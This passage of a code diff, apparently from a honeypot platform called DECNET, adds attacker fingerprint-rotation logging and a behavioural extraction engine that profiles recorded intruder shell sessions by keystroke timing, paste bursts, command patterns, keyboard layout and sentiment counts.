+        def _syslog_rotation(event_type: str, payload: dict[str, Any]) -> None:
+            _write_event(
+                log_path, json_path,
+                "fingerprint_rotated",
+                target_ip=payload["attacker_ip"],
+                target_port=str(payload["port"]),
+                probe_type=payload["probe_type"],
+                old_hash=payload.get("old_hash") or "",
+                new_hash=payload["new_hash"],
+                rotation_count=str(payload["rotation_count"]),
+                msg=(
+                    f"FP rotation {payload['attacker_ip']}:{payload['port']} "
+                    f"{payload['probe_type']} {payload.get('old_hash')} → "
+                    f"{payload['new_hash']}"
+                ),
+            )
+
+        def record_rotation(
+            ip: str, port: int, probe_type: ProbeType, new_hash: str,
+        ) -> None:
+            with Session(rotation_engine) as session:
+                record_fingerprint(
+                    session,
+                    attacker_ip=ip,
+                    port=port,
+                    probe_type=probe_type,
+                    new_hash=new_hash,
+                    ts=datetime.now(timezone.utc),
+                    publish_fn=_publish_rotation,
+                    syslog_fn=_syslog_rotation,
+                )
+
    shutdown = asyncio.Event()
    heartbeat_task = asyncio.create_task(run_health_heartbeat(bus, "prober"))
    control_task = asyncio.create_task(
@@ -612,6 +707,7 @@ async def prober_worker(
                    jarm_ports, hassh_ports, tcp_ports,
                    log_path, json_path, timeout,
                    _publish_attacker,
+                    record_rotation,
                )

            try:
@@ -626,3 +722,6 @@ async def prober_worker(
        if bus is not None:
            with contextlib.suppress(Exception):
                await bus.close()
+        if rotation_engine is not None:
+            with contextlib.suppress(Exception):
+                rotation_engine.dispose()
--- a/decnet/profiler/behave_shell/init.py
+++ b/decnet/profiler/behave_shell/init.py
@@ -0,0 +1,25 @@
+"""BEHAVE-SHELL extraction engine — DECNET's official implementation.
+
+Per ``development/BEHAVE-EXTRACTOR.md``: this package is a pure
+library. Workers (``BEHAVE-INTEGRATION.md`` Phase 4) own I/O, bus
+emission, and persistence. The engine just turns one PTY session into
+``Iterable[Observation]``.
+
+BEHAVE is the spec; DECNET is the engine.
+"""
+from __future__ import annotations
+
+from decnet.profiler.behave_shell.extract import (
+    DEFAULT_SOURCE,
+    build_context,
+    extract_session,
+)
+
+# Phase H.5-pre: extractor is feature-complete (37/37 Tier-A primitives
+# emit; calibration grid honest). The ``-pre`` suffix stays until
+# ``BEHAVE-INTEGRATION.md`` Phase 4 lands the worker wiring + observations
+# table writes + AttackerDetail panel; only then does H.5 proper drop the
+# suffix and tag v0.
+__version__ = "0.1.0-pre"
+
+__all__ = ["DEFAULT_SOURCE", "build_context", "extract_session", "__version__"]
--- a/decnet/profiler/behave_shell/_ctx.py
+++ b/decnet/profiler/behave_shell/_ctx.py
@@ -0,0 +1,573 @@
+"""SessionContext: precomputed bundle every feature function reads from.
+
+A naïve engine re-walks the event stream once per primitive. We don't
+do that — one walk over the events builds this context, every feature
+reads from it. Adding a new feature is O(1) cost on the parse side.
+
+Step 1 fills ``iats`` (inter-key intervals between input events) and
+``paste_bursts`` (contiguous runs of paste-class events). Step 4
+will fill ``commands`` / ``inter_cmd_iats`` / ``output_per_cmd``.
+"""
+from __future__ import annotations
+
+import math
+from dataclasses import dataclass, field
+from typing import Iterable, Mapping
+
+from decnet.profiler.behave_shell._intent import (
+    LEXEME_MAX_LEN,
+    NEGATIVE_LEXEMES,
+    OBSCENITY_LEXEMES,
+    POSITIVE_LEXEMES,
+)
+from decnet.profiler.behave_shell._parse import (
+    AsciinemaEvent,
+    Command,
+    PasteBurst,
+    PromptLine,
+    detect_error_in_output,
+    extract_prompt_lines,
+    hash_token,
+    strip_ansi,
+)
+from decnet.profiler.behave_shell._thresholds import (
+    IKI_THINK_MAX_S,
+    LAYOUT_BIGRAM_TOP_N,
+    PASTE_BURST_MAX_IAT_S,
+    PASTE_MIN_CHARS_PER_EVENT,
+    PROMPT_LINE_MAX_CHARS,
+    SHORTCUT_CTRL_BYTES,
+)
+
+
+@dataclass(frozen=True, slots=True)
+class _LexCounters:
+    """Lexical counters from the typed-text walk (G.0).
+
+    Internal to the ctx-builder; flattened onto SessionContext fields
+    in :func:`build_session_context`.
+    """
+    obscenity_hits: int = 0
+    positive_lex_hits: int = 0
+    negative_lex_hits: int = 0
+    caps_run_max: int = 0
+    bang_run_max: int = 0
+
+
+@dataclass(frozen=True, slots=True)
+class SessionContext:
+    sid: str
+    source: str
+    evidence_ref: str
+    t_start: float
+    t_end: float
+    duration_s: float
+
+    input_events: tuple[AsciinemaEvent, ...] = field(default_factory=tuple)
+    output_events: tuple[AsciinemaEvent, ...] = field(default_factory=tuple)
+
+    # Step 1 derivations
+    iats: tuple[float, ...] = field(default_factory=tuple)
+    paste_bursts: tuple[PasteBurst, ...] = field(default_factory=tuple)
+    paste_event_count: int = 0
+
+    # Step 4 derivations — command segmentation
+    commands: tuple[Command, ...] = field(default_factory=tuple)
+    inter_cmd_iats: tuple[float, ...] = field(default_factory=tuple)
+    output_per_cmd: tuple[int, ...] = field(default_factory=tuple)
+
+    # Step B.1 derivations — typing bursts (IATs split at think-pauses)
+    typing_bursts: tuple[tuple[float, ...], ...] = field(default_factory=tuple)
+
+    # Step B.3 derivations — error-correction signals
+    backspace_count: int = 0
+    backspace_iats: tuple[float, ...] = field(default_factory=tuple)
+    kill_line_count: int = 0
+
+    # Step B.4 derivations — per-command intra-typing IATs
+    intra_command_iats: tuple[tuple[float, ...], ...] = field(default_factory=tuple)
+
+    # Step F.0 derivations — PS1 prompt lines detected in the output stream
+    prompt_lines: tuple[PromptLine, ...] = field(default_factory=tuple)
+
+    # Step F.4 derivations — typed-only character histograms for keyboard
+    # layout fingerprinting (PII boundary lifted by ANTI for Phase F).
+    typed_unigram_counts: Mapping[str, int] = field(default_factory=dict)
+    typed_bigram_counts: Mapping[str, int] = field(default_factory=dict)
+    typed_letter_count: int = 0
+
+    # Step G.0 derivations — lexical counters from the same single-pass
+    # typed-text walk. No raw text retained; only fixed-vocabulary
+    # membership counts and run-lengths. Drives valence (G.5), arousal
+    # (G.6), and frustration_venting (G.8).
+    obscenity_hits: int = 0
+    positive_lex_hits: int = 0
+    negative_lex_hits: int = 0
+    caps_run_max: int = 0
+    bang_run_max: int = 0
+
+
+def _detect_paste_bursts(
+    inputs: list[AsciinemaEvent],
+) -> tuple[tuple[PasteBurst, ...], int]:
+    """Group consecutive paste-class input events into PasteBursts.
+
+    A paste-class event is one with ``len(data) >= PASTE_MIN_CHARS_PER_EVENT``.
+    Two adjacent paste-class events collapse into the same burst when
+    their IAT is within ``PASTE_BURST_MAX_IAT_S``; otherwise a new
+    burst opens. Returns the bursts and the total count of paste-class
+    events (the same number ``BEHAVE`` prototype calls ``paste_events``).
+    """
+    bursts: list[PasteBurst] = []
+    paste_count = 0
+
+    cur_start: float | None = None
+    cur_end: float = 0.0
+    cur_chars: int = 0
+    cur_events: int = 0
+    last_t: float | None = None
+
+    def _close() -> None:
+        nonlocal cur_start, cur_end, cur_chars, cur_events
+        if cur_start is not None and cur_events > 0:
+            bursts.append(PasteBurst(
+                start_ts=cur_start,
+                end_ts=cur_end,
+                char_count=cur_chars,
+                event_count=cur_events,
+            ))
+        cur_start = None
+        cur_end = 0.0
+        cur_chars = 0
+        cur_events = 0
+
+    for t, _kind, data in inputs:
+        is_paste = len(data) >= PASTE_MIN_CHARS_PER_EVENT
+        if is_paste:
+            paste_count += 1
+            if cur_start is None or (
+                last_t is not None and (t - last_t) > PASTE_BURST_MAX_IAT_S
+            ):
+                _close()
+                cur_start = t
+            cur_end = t
+            cur_chars += len(data)
+            cur_events += 1
+        else:
+            _close()
+        last_t = t
+
+    _close()
+    return tuple(bursts), paste_count
+
+
+_BACKSPACE_CHARS = ("\x7f", "\x08")
+_KILL_LINE_CHARS = ("\x15", "\x17")
+
+
+def _scan_correction_signals(
+    inputs: list[AsciinemaEvent],
+) -> tuple[int, tuple[float, ...], int]:
+    """Walk input events char-by-char, count backspaces / kill-lines /
+    timing IATs.
+
+    PII discipline: only counts and IATs leave this function — no
+    character data is retained or returned.
+    """
+    backspace_count = 0
+    kill_line_count = 0
+    iats: list[float] = []
+    last_non_bs_t: float | None = None
+    for t, _kind, data in inputs:
+        for c in data:
+            if c in _BACKSPACE_CHARS:
+                backspace_count += 1
+                if last_non_bs_t is not None:
+                    iats.append(max(0.0, t - last_non_bs_t))
+            elif c in _KILL_LINE_CHARS:
+                kill_line_count += 1
+                last_non_bs_t = t
+            else:
+                last_non_bs_t = t
+    return backspace_count, tuple(iats), kill_line_count
+
+
+def _split_typing_bursts(iats: tuple[float, ...]) -> tuple[tuple[float, ...], ...]:
+    """Split a flat IAT sequence at gaps > IKI_THINK_MAX_S.
+
+    Drops bursts of fewer than 3 IATs — too short to compute a stable
+    CV. Mirrors BEHAVE prototype's ``_split_into_bursts``.
+    """
+    bursts: list[list[float]] = [[]]
+    for x in iats:
+        if x > IKI_THINK_MAX_S:
+            if bursts[-1]:
+                bursts.append([])
+        else:
+            bursts[-1].append(x)
+    return tuple(tuple(b) for b in bursts if len(b) >= 3)
+
+
+def _segment_commands(inputs: list[AsciinemaEvent]) -> tuple[Command, ...]:
+    """Walk input events, splitting on ``\\r`` / ``\\n`` into commands.
+
+    Retains only the first whitespace-delimited token as a sha256 hash
+    plus three integer counters needed for the Phase C
+    ``motor.shell_mastery.*`` primitives:
+
+    * ``tab_count``      — ``\\t`` (0x09) keystrokes in the command
+    * ``shortcut_count`` — readline control bytes from
+      :data:`SHORTCUT_CTRL_BYTES`
+    * ``pipe_count``     — ``|`` characters in the command (counted on
+      every byte; pasted pipelines still indicate pipeline fluency the
+      operator chose to execute)
+
+    Buffer contents are dropped on every command boundary; an
+    unterminated trailing buffer (no final newline) yields no command.
+    """
+    cmds: list[Command] = []
+    buf_chars: list[str] = []
+    buf_start_ts: float | None = None
+    tab_count = 0
+    shortcut_count = 0
+    pipe_count = 0
+
+    for t, _kind, data in inputs:
+        for c in data:
+            if c in ("\r", "\n"):
+                if buf_chars:
+                    text = "".join(buf_chars).strip()
+                    first_token = text.split(maxsplit=1)[0] if text else ""
+                    cmds.append(Command(
+                        start_ts=buf_start_ts if buf_start_ts is not None else t,
+                        end_ts=t,
+                        first_token_hash=hash_token(first_token),
+                        tab_count=tab_count,
+                        shortcut_count=shortcut_count,
+                        pipe_count=pipe_count,
+                    ))
+                buf_chars = []
+                buf_start_ts = None
+                tab_count = 0
+                shortcut_count = 0
+                pipe_count = 0
+            else:
+                if not buf_chars:
+                    buf_start_ts = t
+                buf_chars.append(c)
+                if c == "\t":
+                    tab_count += 1
+                elif c == "|":
+                    pipe_count += 1
+                elif c in SHORTCUT_CTRL_BYTES:
+                    shortcut_count += 1
+
+    return tuple(cmds)
+
+
+def _annotate_commands_with_output(
+    commands: tuple[Command, ...],
+    outputs: list[AsciinemaEvent],
+) -> tuple[tuple[Command, ...], tuple[PromptLine, ...]]:
+    """Re-emit ``commands`` with output-derived fields filled.
+
+    Returns ``(commands, prompt_lines)``. Each ``Command`` gains
+    ``errored``, ``output_bytes``, and ``followed_by_prompt`` (Step
+    F.0). The flattened tuple of all detected ``PromptLine`` instances
+    across every command's window is returned alongside for the caller
+    to install on ``SessionContext.prompt_lines``.
+
+    The output window for ``commands[i]`` spans from its ``end_ts``
+    (the ``\\r``/``\\n`` that ran it) to the ``start_ts`` of the next
+    command. The last command's window is open-ended (``math.inf``)
+    so output events arriving at or after ``t_end`` are still captured.
+    """
+    if not commands:
+        return commands, ()
+    annotated: list[Command] = []
+    all_prompts: list[PromptLine] = []
+    for i, cmd in enumerate(commands):
+        win_end = commands[i + 1].start_ts if i + 1 < len(commands) else math.inf
+        byte_count, errored, prompts = _output_window(outputs, cmd.end_ts, win_end)
+        all_prompts.extend(prompts)
+        annotated.append(Command(
+            start_ts=cmd.start_ts,
+            end_ts=cmd.end_ts,
+            first_token_hash=cmd.first_token_hash,
+            tab_count=cmd.tab_count,
+            shortcut_count=cmd.shortcut_count,
+            pipe_count=cmd.pipe_count,
+            errored=errored,
+            output_bytes=byte_count,
+            followed_by_prompt=bool(prompts),
+        ))
+    return tuple(annotated), tuple(all_prompts)
+
+
+def _per_command_iats(
+    commands: tuple[Command, ...],
+    inputs: list[AsciinemaEvent],
+) -> tuple[tuple[float, ...], ...]:
+    """Per-command IATs between consecutive input events whose
+    timestamps fall in ``[cmd.start_ts, cmd.end_ts)``.
+
+    Excludes the terminator IAT (the last event at ``cmd.end_ts`` is
+    the ``\\r``/``\\n`` itself). Returns one tuple per command.
+    """
+    out: list[tuple[float, ...]] = []
+    for cmd in commands:
+        prev_t: float | None = None
+        cmd_iats: list[float] = []
+        for t, _kind, _data in inputs:
+            if t < cmd.start_ts or t >= cmd.end_ts:
+                continue
+            if prev_t is not None:
+                cmd_iats.append(max(0.0, t - prev_t))
+            prev_t = t
+        out.append(tuple(cmd_iats))
+    return tuple(out)
+
+
+def _output_bytes_between(
+    outputs: list[AsciinemaEvent],
+    start: float,
+    end: float,
+) -> int:
+    """Total ``len(d)`` of output events with ``start <= t < end``."""
+    return sum(len(d) for t, _k, d in outputs if start <= t < end)
+
+
+def _typed_char_histograms(
+    inputs: list[AsciinemaEvent],
+) -> tuple[Mapping[str, int], Mapping[str, int], int, _LexCounters]:
+    """Walk input events, build typed-only unigram + bigram histograms
+    plus the Phase G lexical counters.
+
+    Skip paste-class events (``len(data) >= PASTE_MIN_CHARS_PER_EVENT``)
+    — pasted text reveals nothing about the operator's keyboard or
+    sentiment. Letter bigrams chain only across consecutive ASCII-letter
+    chars; a digit or punctuation character breaks the chain.
+
+    Lexical counters (G.0): a small word buffer (≤ ``LEXEME_MAX_LEN``)
+    accumulates ASCII-letter chars (case-folded). On any non-letter
+    boundary, every suffix of the buffer is checked against
+    ``POSITIVE_LEXEMES`` / ``NEGATIVE_LEXEMES`` / ``OBSCENITY_LEXEMES``;
+    the longest match wins (so ``fucking`` counts as one obscenity hit,
+    not two — ``fuck`` + ``fucking``). Caps and bang runs are tracked
+    in the same walk.
+
+    Returns ``(unigrams, bigrams, total_letters, lex_counters)``.
+    """
+    unigrams: dict[str, int] = {}
+    bigrams: dict[str, int] = {}
+    total_letters = 0
+    last_letter: str | None = None
+
+    word_buf: list[str] = []
+    obscenity_hits = 0
+    positive_lex_hits = 0
+    negative_lex_hits = 0
+    caps_run_cur = 0
+    caps_run_max = 0
+    bang_run_cur = 0
+    bang_run_max = 0
+
+    def _flush_word() -> tuple[int, int, int]:
+        """Match longest lexeme suffix in ``word_buf``; return per-set deltas."""
+        if not word_buf:
+            return 0, 0, 0
+        s = "".join(word_buf)
+        # Longest-suffix scan against fixed lexicons.
+        for length in range(min(len(s), LEXEME_MAX_LEN), 0, -1):
+            suffix = s[-length:]
+            if suffix in OBSCENITY_LEXEMES:
+                return 1, 0, 0
+            if suffix in POSITIVE_LEXEMES:
+                return 0, 1, 0
+            if suffix in NEGATIVE_LEXEMES:
+                return 0, 0, 1
+        return 0, 0, 0
+
+    for _t, _kind, data in inputs:
+        if len(data) >= PASTE_MIN_CHARS_PER_EVENT:
+            # Paste boundary breaks every running counter.
+            last_letter = None
+            obs_d, pos_d, neg_d = _flush_word()
+            obscenity_hits += obs_d
+            positive_lex_hits += pos_d
+            negative_lex_hits += neg_d
+            word_buf.clear()
+            caps_run_cur = 0
+            bang_run_cur = 0
+            continue
+        for c in data:
+            # Caps-run tracking
+            if c.isascii() and c.isupper():
+                caps_run_cur += 1
+                if caps_run_cur > caps_run_max:
+                    caps_run_max = caps_run_cur
+            else:
+                caps_run_cur = 0
+            # Bang-run tracking
+            if c == "!":
+                bang_run_cur += 1
+                if bang_run_cur > bang_run_max:
+                    bang_run_max = bang_run_cur
+            else:
+                bang_run_cur = 0
+            # Histogram + lexeme buffering
+            if c.isascii() and c.isalpha():
+                lower = c.lower()
+                unigrams[lower] = unigrams.get(lower, 0) + 1
+                total_letters += 1
+                if last_letter is not None:
+                    big = last_letter + lower
+                    bigrams[big] = bigrams.get(big, 0) + 1
+                last_letter = lower
+                word_buf.append(lower)
+                if len(word_buf) > LEXEME_MAX_LEN:
+                    # Slide window — only the tail can match a lexeme.
+                    word_buf[:] = word_buf[-LEXEME_MAX_LEN:]
+            else:
+                last_letter = None
+                obs_d, pos_d, neg_d = _flush_word()
+                obscenity_hits += obs_d
+                positive_lex_hits += pos_d
+                negative_lex_hits += neg_d
+                word_buf.clear()
+
+    # Trailing word (no boundary at end of input).
+    obs_d, pos_d, neg_d = _flush_word()
+    obscenity_hits += obs_d
+    positive_lex_hits += pos_d
+    negative_lex_hits += neg_d
+
+    if len(bigrams) > LAYOUT_BIGRAM_TOP_N:
+        top = sorted(bigrams.items(), key=lambda kv: -kv[1])[:LAYOUT_BIGRAM_TOP_N]
+        bigrams = dict(top)
+    return unigrams, bigrams, total_letters, _LexCounters(
+        obscenity_hits=obscenity_hits,
+        positive_lex_hits=positive_lex_hits,
+        negative_lex_hits=negative_lex_hits,
+        caps_run_max=caps_run_max,
+        bang_run_max=bang_run_max,
+    )
+
+
+def _output_window(
+    outputs: list[AsciinemaEvent],
+    start: float,
+    end: float,
+) -> tuple[int, bool, tuple[PromptLine, ...]]:
+    """Walk output events in ``[start, end)`` once.
+
+    Returns ``(byte_count, errored, prompt_lines)``. ``byte_count`` is
+    the raw byte count (pre-strip); ``errored`` is the canonical-error
+    -pattern match over the ANSI-stripped concatenation;
+    ``prompt_lines`` is the tuple of PS1 lines detected in the same
+    stripped text (Step F.0).
+
+    PII trade-off (Phase F): the stripped text itself is dropped on
+    return, but ``prompt_lines`` retains PS1 strings (capped at
+    ``PROMPT_LINE_MAX_CHARS``). Only derived values leave the engine
+    via observations; the prompt strings live on ``SessionContext``
+    so F.1 / F.3 / E.4 can read them.
+    """
+    chunks: list[str] = []
+    last_ts = start
+    byte_count = 0
+    for t, _k, d in outputs:
+        if start <= t < end:
+            byte_count += len(d)
+            chunks.append(d)
+            last_ts = t
+    if not chunks:
+        return 0, False, ()
+    stripped = strip_ansi("".join(chunks))
+    errored = detect_error_in_output(stripped)
+    prompts = tuple(extract_prompt_lines(
+        stripped, base_ts=last_ts, max_chars=PROMPT_LINE_MAX_CHARS,
+    ))
+    return byte_count, errored, prompts
+
+
+def build_session_context(
+    events: Iterable[AsciinemaEvent],
+    *,
+    sid: str,
+    source: str,
+    evidence_ref: str | None = None,
+) -> SessionContext:
+    """Single-pass build of the SessionContext for ``events``."""
+    inputs: list[AsciinemaEvent] = []
+    outputs: list[AsciinemaEvent] = []
+    t_first: float | None = None
+    t_last: float = 0.0
+
+    for ev in events:
+        t, kind, _ = ev
+        if t_first is None:
+            t_first = t
+        if t > t_last:
+            t_last = t
+        if kind == "i":
+            inputs.append(ev)
+        elif kind == "o":
+            outputs.append(ev)
+
+    if t_first is None:
+        t_start = 0.0
+        t_end = 0.0
+    else:
+        t_start = t_first
+        t_end = t_last
+
+    iats: tuple[float, ...] = tuple(
+        max(0.0, inputs[i][0] - inputs[i - 1][0]) for i in range(1, len(inputs))
+    )
+    paste_bursts, paste_count = _detect_paste_bursts(inputs)
+    typing_bursts = _split_typing_bursts(iats)
+    backspace_count, backspace_iats, kill_line_count = _scan_correction_signals(inputs)
+    commands = _segment_commands(inputs)
+    commands, prompt_lines = _annotate_commands_with_output(commands, outputs)
+    inter_cmd_iats = tuple(
+        max(0.0, commands[i + 1].start_ts - commands[i].end_ts)
+        for i in range(len(commands) - 1)
+    )
+    output_per_cmd = tuple(
+        _output_bytes_between(outputs, commands[i].end_ts, commands[i + 1].start_ts)
+        for i in range(len(commands) - 1)
+    )
+    intra_command_iats = _per_command_iats(commands, inputs)
+    typed_uni, typed_bi, typed_letters, lex = _typed_char_histograms(inputs)
+
+    return SessionContext(
+        sid=sid,
+        source=source,
+        evidence_ref=evidence_ref or f"session:{sid}",
+        t_start=t_start,
+        t_end=t_end,
+        duration_s=max(0.0, t_end - t_start),
+        input_events=tuple(inputs),
+        output_events=tuple(outputs),
+        iats=iats,
+        paste_bursts=paste_bursts,
+        paste_event_count=paste_count,
+        commands=commands,
+        inter_cmd_iats=inter_cmd_iats,
+        output_per_cmd=output_per_cmd,
+        typing_bursts=typing_bursts,
+        backspace_count=backspace_count,
+        backspace_iats=backspace_iats,
+        kill_line_count=kill_line_count,
+        intra_command_iats=intra_command_iats,
+        prompt_lines=prompt_lines,
+        typed_unigram_counts=typed_uni,
+        typed_bigram_counts=typed_bi,
+        typed_letter_count=typed_letters,
+        obscenity_hits=lex.obscenity_hits,
+        positive_lex_hits=lex.positive_lex_hits,
+        negative_lex_hits=lex.negative_lex_hits,
+        caps_run_max=lex.caps_run_max,
+        bang_run_max=lex.bang_run_max,
+    )
--- a/decnet/profiler/behave_shell/_features/init.py
+++ b/decnet/profiler/behave_shell/_features/init.py
@@ -0,0 +1,104 @@
+"""Registered feature functions.
+
+Each entry takes a ``SessionContext`` and yields zero or more
+``Observation`` instances. Adding a primitive = adding a function in a
+sibling module and appending it to ``FEATURES``.
+"""
+from __future__ import annotations
+
+from typing import Callable, Iterable
+
+from behave_core.spec.envelope import Observation
+
+from decnet.profiler.behave_shell._ctx import SessionContext
+from decnet.profiler.behave_shell._features.cognitive import (
+    cognitive_load,
+    command_branch_diversity,
+    error_resilience_fallback_to_man,
+    error_resilience_frustration_typing,
+    error_resilience_retry_tactic,
+    exploration_style,
+    feedback_loop_engagement,
+    planning_depth,
+    tool_vocabulary,
+    inter_command_consistency,
+    inter_command_latency_class,
+)
+from decnet.profiler.behave_shell._features.emotional_valence import (
+    arousal,
+    frustration_venting,
+    stress_response,
+    valence,
+)
+from decnet.profiler.behave_shell._features.environmental import (
+    keyboard_layout,
+    locale,
+    numpad_usage,
+    shell_type,
+    terminal_multiplexer,
+)
+from decnet.profiler.behave_shell._features.operational import (
+    cleanup_behavior,
+    multi_actor_indicators,
+    objective,
+    opsec_discipline,
+)
+from decnet.profiler.behave_shell._features.temporal import (
+    escalation_pattern,
+    exit_behavior,
+    landing_ritual,
+    session_duration,
+)
+from decnet.profiler.behave_shell._features.motor import (
+    command_chunking,
+    error_correction,
+    input_modality,
+    keystroke_cadence,
+    motor_stability,
+    paste_burst_rate,
+    pipe_chaining_depth,
+    shortcut_usage,
+    tab_completion,
+)
+
+FeatureFn = Callable[[SessionContext], Iterable[Observation]]
+
+FEATURES: tuple[FeatureFn, ...] = (
+    input_modality,
+    paste_burst_rate,
+    keystroke_cadence,
+    motor_stability,
+    error_correction,
+    command_chunking,
+    tab_completion,
+    shortcut_usage,
+    pipe_chaining_depth,
+    inter_command_latency_class,
+    command_branch_diversity,
+    feedback_loop_engagement,
+    inter_command_consistency,
+    cognitive_load,
+    exploration_style,
+    planning_depth,
+    tool_vocabulary,
+    error_resilience_retry_tactic,
+    error_resilience_frustration_typing,
+    error_resilience_fallback_to_man,
+    session_duration,
+    escalation_pattern,
+    landing_ritual,
+    exit_behavior,
+    shell_type,
+    terminal_multiplexer,
+    locale,
+    keyboard_layout,
+    numpad_usage,
+    objective,
+    opsec_discipline,
+    cleanup_behavior,
+    multi_actor_indicators,
+    valence,
+    arousal,
+    stress_response,
+    frustration_venting,
+)
--- a/decnet/profiler/behave_shell/_features/_emit.py
+++ b/decnet/profiler/behave_shell/_features/_emit.py
@@ -0,0 +1,32 @@
+"""Helper for building registry-valid :class:`Observation` records.
+
+Every feature module would otherwise repeat the same Window /
+source / evidence_ref boilerplate. This helper centralises it and is
+the one place to reach when emission semantics change (e.g. when we
+start parametrising windows on a per-primitive basis).
+"""
+from __future__ import annotations
+
+from typing import Any
+
+from behave_core.spec.envelope import Observation, Window
+
+from decnet.profiler.behave_shell._ctx import SessionContext
+
+
+def make_observation(
+    ctx: SessionContext,
+    *,
+    primitive: str,
+    value: Any,
+    confidence: float,
+) -> Observation:
+    """Build one :class:`Observation` for the whole-session window."""
+    return Observation(
+        primitive=primitive,
+        value=value,
+        confidence=confidence,
+        window=Window(start_ts=ctx.t_start, end_ts=ctx.t_end),
+        source=ctx.source,
+        evidence_ref=ctx.evidence_ref,
+    )
--- a/decnet/profiler/behave_shell/_features/cognitive.py
+++ b/decnet/profiler/behave_shell/_features/cognitive.py
@@ -0,0 +1,593 @@
+"""``cognitive.*`` feature functions.
+
+Step 5: ``cognitive.inter_command_latency_class``.
+Step 6: ``cognitive.command_branch_diversity``.
+Step 7: ``cognitive.feedback_loop_engagement``.
+Step 8: ``cognitive.inter_command_consistency``.
+Step D.1: ``cognitive.cognitive_load``.
+"""
+from __future__ import annotations
+
+import statistics
+from typing import Iterator
+
+from behave_core.spec.envelope import Observation
+
+from decnet.profiler.behave_shell._ctx import SessionContext
+from decnet.profiler.behave_shell._features._emit import make_observation
+from decnet.profiler.behave_shell._parse import hash_token
+from decnet.profiler.behave_shell._thresholds import (
+    BRANCH_DIVERSITY_LINEAR_MIN,
+    COGNITIVE_LOAD_CHUNKING_REF_CV,
+    COGNITIVE_LOAD_LOW_MAX,
+    COGNITIVE_LOAD_MEDIUM_MAX,
+    COGNITIVE_LOAD_PACE_REF_CV,
+    EXPLORATION_CHAOTIC_BACKTRACK_MIN,
+    EXPLORATION_TARGETED_REP_MIN,
+    FEEDBACK_CORRELATION_MIN,
+    FEEDBACK_MIN_PAIRS,
+    FRUSTRATION_LOW_MAX,
+    FRUSTRATION_MODERATE_MAX,
+    IKI_THINK_MAX_S,
+    INTER_CMD_DELIBERATE_MAX,
+    INTER_CMD_INSTANT_MAX,
+    INTER_CMD_LLM_HEAVYWEIGHT_MAX,
+    INTER_CMD_LLM_LIGHTWEIGHT_MAX,
+    INTER_CMD_TYPING_MAX,
+    MIN_COMMANDS_FOR_FULL_CONFIDENCE,
+    PAUSE_CV_BIMODAL_MIN,
+    PAUSE_CV_METRONOMIC_MAX,
+    PLANNING_DEEP_MIN,
+    PLANNING_REACTIVE_MIN,
+    TOOL_VOCAB_BROAD_MIN,
+    TOOL_VOCAB_NARROW_MAX,
+)
+
+
+# Precomputed at import time so the per-session hot loop is a set
+# membership check, not 3 sha256 ops per command. The ``--help`` /
+# ``-h`` flag forms can't be detected here — they're not first tokens
+# (PII discipline keeps only the *first* token's hash). v0.2 will
+# reconsider once corpus calibration justifies storing arg-token
+# hashes too.
+_HELP_FAMILY_HASHES: frozenset[str] = frozenset({
+    hash_token("man"),
+    hash_token("help"),
+    hash_token("info"),
+})
+
+
+def _clip01(x: float) -> float:
+    if x < 0.0:
+        return 0.0
+    if x > 1.0:
+        return 1.0
+    return x
+
+
+def _cv(xs: tuple[float, ...] | list[float]) -> float | None:
+    """Coefficient of variation; ``None`` if undefined (n<2 or mean==0)."""
+    if len(xs) < 2:
+        return None
+    mean = statistics.fmean(xs)
+    if mean <= 0.0:
+        return None
+    return statistics.stdev(xs) / mean
+
+
+def _bucket_inter_cmd_latency(median_iat: float) -> str:
+    if median_iat <= INTER_CMD_INSTANT_MAX:
+        return "instant"
+    if median_iat <= INTER_CMD_TYPING_MAX:
+        return "typing_speed"
+    if median_iat <= INTER_CMD_DELIBERATE_MAX:
+        return "deliberate"
+    if median_iat <= INTER_CMD_LLM_LIGHTWEIGHT_MAX:
+        return "llm_lightweight"
+    if median_iat <= INTER_CMD_LLM_HEAVYWEIGHT_MAX:
+        return "llm_heavyweight"
+    return "long"
+
+
+def inter_command_latency_class(ctx: SessionContext) -> Iterator[Observation]:
+    """Emit ``cognitive.inter_command_latency_class``.
+
+    Operator's *thinking pace* between commands, bucketed against
+    calibrated thresholds. Splits LW-sim / CLAUDE-FF / CLAUDE-CL.
+    """
+    if not ctx.inter_cmd_iats:
+        return
+    median_iat = statistics.median(ctx.inter_cmd_iats)
+    bucket = _bucket_inter_cmd_latency(median_iat)
+    # Sample-size honesty: < 5 commands → halve confidence
+    if len(ctx.commands) < MIN_COMMANDS_FOR_FULL_CONFIDENCE:
+        confidence = 0.40
+    else:
+        confidence = 0.80
+    yield make_observation(
+        ctx,
+        primitive="cognitive.inter_command_latency_class",
+        value=bucket,
+        confidence=confidence,
+    )
+
+
+def command_branch_diversity(ctx: SessionContext) -> Iterator[Observation]:
+    """Emit ``cognitive.command_branch_diversity``.
+
+    Content-based discriminator (no timing): unique first-token ratio
+    over total commands. Splits CLAUDE-FF (linear_playbook) from
+    CLAUDE-CL (adaptive_branching). The empirical anchor on
+    2026-05-02: fire-and-forget runs ~10 distinct tools; closed-loop
+    runs 5-6 with ``curl`` re-invoked as the operator chases threads.
+    """
+    n = len(ctx.commands)
+    if n == 0:
+        # No commands at all → nothing honest to say. Skip emission.
+        return
+    if n < MIN_COMMANDS_FOR_FULL_CONFIDENCE:
+        # Registry admits "unknown"; absence of *enough* data is itself
+        # a high-confidence answer.
+        yield make_observation(
+            ctx,
+            primitive="cognitive.command_branch_diversity",
+            value="unknown",
+            confidence=1.0,
+        )
+        return
+    unique = len({c.first_token_hash for c in ctx.commands})
+    ratio = unique / n
+    if ratio >= BRANCH_DIVERSITY_LINEAR_MIN:
+        value = "linear_playbook"
+    else:
+        # Anything below the linear floor is treated as adaptive — the
+        # operator is reusing tools, the discriminative signal we
+        # actually want.
+        value = "adaptive_branching"
+    yield make_observation(
+        ctx,
+        primitive="cognitive.command_branch_diversity",
+        value=value,
+        confidence=0.80,
+    )
+
+
+def feedback_loop_engagement(ctx: SessionContext) -> Iterator[Observation]:
+    """Emit ``cognitive.feedback_loop_engagement``.
+
+    Pearson correlation between ``output_per_cmd[i]`` (bytes the
+    operator saw before the next command) and
+    ``inter_cmd_iats[i]`` (the pause that followed). closed_loop
+    operators read more before pausing more; fire_and_forget operators
+    pace independently of output. CUTS ACROSS the LLM/human axis —
+    closed-loop LLMs and reading humans both score closed_loop.
+
+    First primitive that depends on output events: zero output events
+    in the shard → emit ``unknown`` at confidence 1.0 (no honest
+    correlation possible) and exit.
+    """
+    pairs = list(zip(ctx.output_per_cmd, ctx.inter_cmd_iats))
